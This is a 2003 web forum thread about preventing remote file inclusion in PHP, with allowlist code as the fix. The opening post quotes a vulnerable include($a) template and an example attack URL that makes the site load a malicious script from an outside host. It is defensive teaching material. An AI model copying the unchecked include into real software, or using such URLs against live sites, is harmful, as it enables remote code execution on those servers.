
PHP Security

Further to 'Some common mistakes'

         

mipapage

12:12 pm on May 15, 2003 (gmt 0)




Building on this thread, which is now closed:
[webmasterworld.com]

For example, I saw one website where the urls were all index.php?a=filename and index.php was a template with:
include($a);
in the middle. If someone were to form a url such as index.php?a=http://www.theirdomain.com/maliciousscript.php,
problems would have ensued.

This was posted in the thread quoted above.

With a few new sites that I am designing, I will be doing the very thing outlined above, based on advice that I received here at WW [webmasterworld.com].

Now, I am 'cloaking' my urls using mod_rewrite, making them all .html files. So, this in effect would hide the fact that my site even uses anything dynamic, let alone PHP. But still, I'm sure there may be ways to figure this out, is there anything else that I can do to be sure that I am safe?


One idea that I had was to use random/wacko names for my variables. This would not be too confusing for these sites, as I am not using too many variables. Does this make sense/work?

cidrolin

2:38 pm on May 15, 2003 (gmt 0)




I don't think passing unchecked variables to an include() or require() to be good programming practice, as far as security is concerned. Rewriting urls is so frequent nowadays that it's somewhat naive to assume no-one will suspect dynamic page generation lies behind such urls.

Personally I use a database to store the content, which means I only use hard-coded include() statements for function libraries and to initialize variables/constants.

If you feel using files is necessary for your projects, I would suggest that you keep a textfile with all the filenames your script is allowed to call, then check if the GET-method passed value is somewhere in this file before include()-ing it.

As this textfile is not intended for publication you can adequately protect it from the http server with a .htaccess file for example (assuming you're using Apache).

mipapage

2:56 pm on May 15, 2003 (gmt 0)




Thanks cidrolin,

We are using Apache, and I believe I saw an example of what you mention somewhere... I'm off to check it out...

senior mcinvale

3:38 pm on May 15, 2003 (gmt 0)




Check the values being passed into your include.

mipapage

9:51 pm on May 15, 2003 (gmt 0)




cidrolin and senior_mcinvale:

How's this for a solution? (picked from alistapart)

$acceptable_pages = array(
'test',
'another',
'photos',
'projects'
);

// get the page from the URL (empty string if no page was requested)
$page = isset( $_REQUEST[ 'page' ] ) ? $_REQUEST[ 'page' ] : '';
// make sure the page is in the acceptable pages array
// (strict comparison, so only an exact string match passes)
if ( in_array( $page, $acceptable_pages, true ) )
{
include("{$page}.php");
}
else
{
// 404 page
include( "error.php" );
}

I would include this in my template.php file, for example. I imagine that seeing this very basic code is making you both mash your teeth, but this seems to be a simple and effective solution.

It seems kinda thin and inelegant to me as well - however, I am class="rookie" with PHP, and it does get the job done.


I'm sure this is one of those things you look back on and think 'what a rookie'
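A way to put cidrolin's text-file allowlist and the in_array() check from mipapage's post together, as an added example that is not code from the thread; the allowed_pages.txt file, the private/ and pages/ directories and the error.php name are assumptions.

```php
<?php
// Added example, not code from the thread. The allowlist is a text file with one
// page name per line, kept outside the document root so Apache never serves it.
// ALLOWLIST_FILE, PAGE_DIR and error.php are assumed names.
define('ALLOWLIST_FILE', dirname(__DIR__) . '/private/allowed_pages.txt');
define('PAGE_DIR', __DIR__ . '/pages');

function loadAllowedPages(string $path): array
{
    if (!is_readable($path)) {
        return []; // a missing allowlist means nothing is allowed
    }
    $lines = file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    return array_map('trim', $lines);
}

function resolvePage(string $requested, array $allowed): ?string
{
    // Reject anything that is not a plain page name before consulting the list,
    // so "../", "/", "http://" and null bytes never get near include().
    if (!preg_match('/^[a-z0-9_-]{1,40}$/i', $requested)) {
        return null;
    }
    // Strict comparison: allowlist entries are strings, no type juggling.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $file = realpath(PAGE_DIR . '/' . $requested . '.php');
    // Defence in depth: the resolved file must still sit inside PAGE_DIR.
    $base = realpath(PAGE_DIR) . DIRECTORY_SEPARATOR;
    if ($file === false || strpos($file, $base) !== 0) {
        return null;
    }
    return $file;
}

$requested = isset($_GET['page']) ? (string) $_GET['page'] : 'index';
$target = resolvePage($requested, loadAllowedPages(ALLOWLIST_FILE));

if ($target === null) {
    header('HTTP/1.0 404 Not Found');
    include __DIR__ . '/error.php';
} else {
    include $target;
}
```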